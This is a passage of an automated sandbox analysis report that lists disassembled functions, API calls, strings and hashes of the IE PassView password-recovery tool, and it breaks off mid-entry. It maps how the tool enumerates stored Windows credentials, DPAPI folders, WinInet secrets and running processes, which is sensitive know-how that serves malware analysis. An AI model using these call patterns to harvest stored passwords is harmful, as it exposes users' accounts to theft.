                                        • Opcode Fuzzy Hash: b4c16071b9a7532792fcb4d9f5e964cc282a1dde44ff47dac44f1ca561dbac0a
                                        • Instruction Fuzzy Hash: D351B330500208BFEB225F61DE85FAE7BA6EB04700F10893AF955BA5F0C775AD61DB09
                                        APIs
                                          • Part of subcall function 004077E7: LoadMenuA.USER32(00000000), ref: 004077EF
                                          • Part of subcall function 004077E7: sprintf.MSVCRT ref: 00407812
                                        • SetMenu.USER32(?,00000000), ref: 0040A6CF
                                        • 6F5894F0.COMCTL32(50000000,0040E470,?,00000101), ref: 0040A6EA
                                        • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A708
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040A70D
                                        • LoadImageA.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 0040A71E
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040A758
                                        • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 0040A783
                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001), ref: 0040A7EC
                                        • LoadIconA.USER32(00000000,00000066), ref: 0040A7F5
                                        • SetFocus.USER32(?,?,/noreg), ref: 0040A86A
                                        • GetFileAttributesA.KERNEL32(004125A8,?,/noreg), ref: 0040A884
                                        • GetTempPathA.KERNEL32(00000104,004125A8,?,/noreg), ref: 0040A894
                                        • strlen.MSVCRT ref: 0040A89B
                                        • strlen.MSVCRT ref: 0040A8A9
                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040A8F6
                                        • SendMessageA.USER32(?,0000104E,00000000,00000000), ref: 0040A920
                                        • SendMessageA.USER32(00000000,00000403,00000002,0000FFFF), ref: 0040A933
                                        • SendMessageA.USER32(?,00000403,00000003,0000000A), ref: 0040A93D
                                        • SendMessageA.USER32(?,00000403,00000001,0000000A), ref: 0040A947
                                          • Part of subcall function 00403FEE: strlen.MSVCRT ref: 0040400B
                                          • Part of subcall function 00403FEE: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 0040402F
                                        • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040A968
                                        • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040A97C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSend$HandleLoadModulestrlen$Menu$AttributesClipboardCreateF5894FileFocusFormatIconImagePathRegisterTempWindowsprintf
                                        • String ID: /noreg$SysListView32$commdlg_FindReplace$report.html
                                        • API String ID: 478718253-3205826372
                                        • Opcode ID: ecf2ce4abb139d9e1560520fc5a074635b50365801fe6e54e165574c8d11df66
                                        • Instruction ID: c7d200016f375faa40e5c412c0c460c7da11ca212d389b44d4b46c1aacdb66f9
                                        • Opcode Fuzzy Hash: ecf2ce4abb139d9e1560520fc5a074635b50365801fe6e54e165574c8d11df66
                                        • Instruction Fuzzy Hash: 18C1E171505388AFEB129F65CC8ABCE7FA5AF14300F044479FA48BB2D2C7B55518CBA9
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 0040BC3C
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040BC54
                                        • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040BC73
                                        • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040BC80
                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040BC89
                                        • memset.MSVCRT ref: 0040BCB1
                                        • memset.MSVCRT ref: 0040BCD1
                                        • memset.MSVCRT ref: 0040BCEF
                                        • memset.MSVCRT ref: 0040BD08
                                        • memset.MSVCRT ref: 0040BD26
                                        • memset.MSVCRT ref: 0040BD3F
                                        • GetCurrentProcess.KERNEL32 ref: 0040BD47
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040BD6C
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040BDA2
                                        • memset.MSVCRT ref: 0040BDDD
                                        • GetCurrentProcessId.KERNEL32 ref: 0040BDEB
                                        • memcpy.MSVCRT(?,00411F30,00000118), ref: 0040BE1A
                                        • _mbscpy.MSVCRT(?,00000000), ref: 0040BE3C
                                        • sprintf.MSVCRT ref: 0040BEA7
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040BEC0
                                        • GetDlgItem.USER32(?,000003EA), ref: 0040BECA
                                        • SetFocus.USER32(00000000), ref: 0040BED1
                                        Strings
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040BEA1
                                        • {Unknown}, xrefs: 0040BCB6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                        • API String ID: 1428123949-3474136107
                                        • Opcode ID: 7373fe983fa7d826f3d98fdd397c2cbd796ef5b67f241b84af1fafadaa8bf6c4
                                        • Instruction ID: ab82093e82b0dc2be47d1e4c554b5134929d62590cb0d9f559d066302e60e584
                                        • Opcode Fuzzy Hash: 7373fe983fa7d826f3d98fdd397c2cbd796ef5b67f241b84af1fafadaa8bf6c4
                                        • Instruction Fuzzy Hash: F571ABB2404248BFD7219F51DC45EEB7B9CEB44344F00443EF648A21E1D735A919DBAE
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf$_mbscpy
                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                        • API String ID: 633282248-1996832678
                                        • Opcode ID: 454e3b97b3d028b6050df625e5cdfdacca5a384f5c085efc3af82c9e53fef484
                                        • Instruction ID: 4b6673b6d978c94f635e7920ddbb95c6d9023c96c3e466d0fab0bc554a397e0a
                                        • Opcode Fuzzy Hash: 454e3b97b3d028b6050df625e5cdfdacca5a384f5c085efc3af82c9e53fef484
                                        • Instruction Fuzzy Hash: 7231BBB2C05215BFD724AAD49C82D9AB35C9F10365F1041BFF914B21C2DB7CAA8C8B5D
                                        APIs
                                        • memset.MSVCRT ref: 00408F82
                                        • memset.MSVCRT ref: 00408FA5
                                        • memset.MSVCRT ref: 00408FBB
                                        • memset.MSVCRT ref: 00408FCB
                                        • sprintf.MSVCRT ref: 00408FFF
                                        • _mbscpy.MSVCRT(00000000, nowrap), ref: 00409046
                                        • sprintf.MSVCRT ref: 004090CD
                                        • _mbscat.MSVCRT ref: 004090FC
                                          • Part of subcall function 0040D096: sprintf.MSVCRT ref: 0040D0B5
                                        • _mbscpy.MSVCRT(004093B4,?), ref: 004090E1
                                        • sprintf.MSVCRT ref: 00409130
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                        • API String ID: 710961058-601624466
                                        • Opcode ID: 503ee7d79ae4fec1e096e4d24a48d019df390286079e467b253fdb3b37d063dc
                                        • Instruction ID: 1fb9cbf94fbf9db8d6d6d563c050f411e0517f3dea1d4c0cd6346e753d28852d
                                        • Opcode Fuzzy Hash: 503ee7d79ae4fec1e096e4d24a48d019df390286079e467b253fdb3b37d063dc
                                        • Instruction Fuzzy Hash: 1961BF31900208AFDF14EF95CC86EDE7B79EF04314F1001AAF918BA2D2DB39AA45CB55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: sprintf$memset$_mbscpy
                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                        • API String ID: 3402215030-3842416460
                                        • Opcode ID: 7e76d5a04eef2a531a64342e17b0c3fc78b35fcee9df5c805667bda5edc55b22
                                        • Instruction ID: cb7c4f64b5ee6ae6c3203d53366d56183c9d72d71c58fbd2a4889d1051ba2003
                                        • Opcode Fuzzy Hash: 7e76d5a04eef2a531a64342e17b0c3fc78b35fcee9df5c805667bda5edc55b22
                                        • Instruction Fuzzy Hash: 534124B2C0111D6ADB21DA95CC81FEB776CAF14319F0401B7B918F21C2E6389B5D8B65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _strcmpi
                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                        • API String ID: 1439213657-1959339147
                                        • Opcode ID: 10e8d8571f25f0fca3a519c2fd4170dcdca92cdeebca7750479ab782993dd494
                                        • Instruction ID: 20a6fcd9a940255a688d7b0250f2248a35fc65a577c324fc704e39fb8d27135f
                                        • Opcode Fuzzy Hash: 10e8d8571f25f0fca3a519c2fd4170dcdca92cdeebca7750479ab782993dd494
                                        • Instruction Fuzzy Hash: 79010C6269931238F86422A72D17B470A49CB91B7AF71993FF514F80D9EF7C500450AD
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040705C,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 00403327
                                        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0040333B
                                        • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403347
                                        • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403353
                                        • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 0040335F
                                        • GetProcAddress.KERNEL32(?,CryptHashData), ref: 0040336B
                                        • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403377
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                        • API String ID: 2238633743-1621422469
                                        • Opcode ID: 6c79e390df775d539c368336c2ecfa3f2549874e9245ec2e66bc54a96e53f201
                                        • Instruction ID: 8e0dd15aec38e0fd7c38dc5f5a73f20ec7812c2ba6613e422e05b2acbdc7fbab
                                        • Opcode Fuzzy Hash: 6c79e390df775d539c368336c2ecfa3f2549874e9245ec2e66bc54a96e53f201
                                        • Instruction Fuzzy Hash: C5F0A975940744AEDB307F779D09E06BEE1EFA87017218D3EE1D163690D6B99060CF45
                                        APIs
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 004033D2
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 004033DF
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 0040340F
                                          • Part of subcall function 004033B4: strlen.MSVCRT ref: 0040341D
                                        • memset.MSVCRT ref: 00402C54
                                        • memset.MSVCRT ref: 00402C6B
                                        • memset.MSVCRT ref: 00402C82
                                        • memset.MSVCRT ref: 00402C99
                                        • strlen.MSVCRT ref: 00402CAD
                                        • strlen.MSVCRT ref: 00402CBB
                                        • strlen.MSVCRT ref: 00402CEA
                                        • strlen.MSVCRT ref: 00402CF8
                                        • strlen.MSVCRT ref: 00402D27
                                        • strlen.MSVCRT ref: 00402D35
                                        • strlen.MSVCRT ref: 00402D64
                                        • strlen.MSVCRT ref: 00402D72
                                          • Part of subcall function 00405918: _mbscpy.MSVCRT(?,?,?,00403438,?,Application Data\Microsoft\Protect,?,?,?,00000000,00402C40,?), ref: 00405920
                                          • Part of subcall function 00405918: _mbscat.MSVCRT ref: 0040592F
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$memset$_mbscat_mbscpy
                                        • String ID: AppData\Local$AppData\Roaming$Application Data$Local Settings\Application Data
                                        • API String ID: 2399022799-1616091409
                                        • Opcode ID: 3be53faf8907f854b252f09969c909306221ba75ca6a754eabe49422fde229f1
                                        • Instruction ID: 0aa79fb4c3caf9cdf13b794d92e13ff8df788c9497b0bc208439cc72e661e6b2
                                        • Opcode Fuzzy Hash: 3be53faf8907f854b252f09969c909306221ba75ca6a754eabe49422fde229f1
                                        • Instruction Fuzzy Hash: 7F51A7B150411CAADB15EB55CC85BDDB7ACAF04308F1004BBF508F61C2DBBC9B889B99
                                        APIs
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        • memset.MSVCRT ref: 0040271A
                                        • memset.MSVCRT ref: 0040272E
                                        • memset.MSVCRT ref: 00402742
                                        • sprintf.MSVCRT ref: 00402763
                                        • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 0040277F
                                        • sprintf.MSVCRT ref: 004027B6
                                        • sprintf.MSVCRT ref: 004027E7
                                        Strings
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004026F2
                                        • IE PassView, xrefs: 004027CD
                                        • <table dir="rtl"><tr><td>, xrefs: 00402779
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004027E1
                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00402791
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040275D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$IE PassView
                                        • API String ID: 113626815-2840149160
                                        • Opcode ID: bb36ad5aa00d1c5d5c6db54a0930051e88cfaa18a912c190982c7715a2f9a6af
                                        • Instruction ID: 79ec9f827acb84f4e73bb674bc78c0bf489e66189f469c4492059895979903f2
                                        • Opcode Fuzzy Hash: bb36ad5aa00d1c5d5c6db54a0930051e88cfaa18a912c190982c7715a2f9a6af
                                        • Instruction Fuzzy Hash: BB3167B2C00118BADB64D795CC82EDE77ACEB04314F1045B7F908B31C1DA786BD88B69
                                        APIs
                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040C16C,0040BDC4), ref: 0040C0D9
                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040C0F2
                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040C103
                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040C114
                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040C125
                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040C136
                                        • FreeLibrary.KERNEL32(00000000), ref: 0040C156
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$Library$FreeLoad
                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                        • API String ID: 2449869053-232097475
                                        • Opcode ID: 8bae9f90865ef67b8577d95b1b06d497210238930ec4d9d0db7395eb778b4a76
                                        • Instruction ID: c87147c288e77a78077066b68bba7e28773a7c5f6cc3d20f75e2f18e7ded8720
                                        • Opcode Fuzzy Hash: 8bae9f90865ef67b8577d95b1b06d497210238930ec4d9d0db7395eb778b4a76
                                        • Instruction Fuzzy Hash: 6C018470505712DAC7219F28AE90B6B3FE89749B40F10453BE504F92E5DBBCC4468FAC
                                        APIs
                                        • wcslen.MSVCRT ref: 00402E7D
                                        • memset.MSVCRT ref: 00402E9D
                                        • wcschr.MSVCRT ref: 00402F2C
                                        • wcsncmp.MSVCRT ref: 00402F45
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00402FC1
                                        • wcschr.MSVCRT ref: 00402FDF
                                        • wcscpy.MSVCRT ref: 00402FF5
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0000000C), ref: 00403006
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,0000000C), ref: 00403095
                                        • LocalFree.KERNEL32(?,?,?,?,?,?,0000000C), ref: 004030A8
                                        • memcpy.MSVCRT(?,00000004,-000000F4,?,?,0000000C), ref: 004030EE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpy$FreeLocalwcschr$memsetwcscpywcslenwcsncmp
                                        • String ID: Microsoft_WinInet
                                        • API String ID: 121219126-2056801976
                                        • Opcode ID: 31339bb1bfd41b7cda9937e0eb12282c12b3f69bb2134050ca348a437243ed26
                                        • Instruction ID: 740406e3f86503c8a0d7b7516b21f816cafa52995530843ae5346f6235719748
                                        • Opcode Fuzzy Hash: 31339bb1bfd41b7cda9937e0eb12282c12b3f69bb2134050ca348a437243ed26
                                        • Instruction Fuzzy Hash: FA91F8B1D002199BDF10DF94D944ADEBBB8FF08304F108576E919FB281E778AA45CB99
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C173,0040BDC4), ref: 0040C051
                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C06A
                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040C07B
                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040C08C
                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040C09D
                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040C0AE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                        • API String ID: 667068680-3953557276
                                        • Opcode ID: 1cb7c79e6c559eeea0141376727ce9c35e81f11d5fdf0e22e2ba3d11b968f958
                                        • Instruction ID: 7eeed2c357a9b3532822de87abd471f84b8860815f5170c185e05fe0bb6bf640
                                        • Opcode Fuzzy Hash: 1cb7c79e6c559eeea0141376727ce9c35e81f11d5fdf0e22e2ba3d11b968f958
                                        • Instruction Fuzzy Hash: 8FF08671521312E9C3208B65EDC0FA729A45B44B44714813BA900F22E4DBBC8903CB7D
                                        APIs
                                          • Part of subcall function 004029F3: FreeLibrary.KERNEL32(?,00402980,?,00401F1F), ref: 004029FA
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00401F1F), ref: 00402985
                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040299E
                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 004029AA
                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 004029B6
                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 004029C2
                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004029CE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
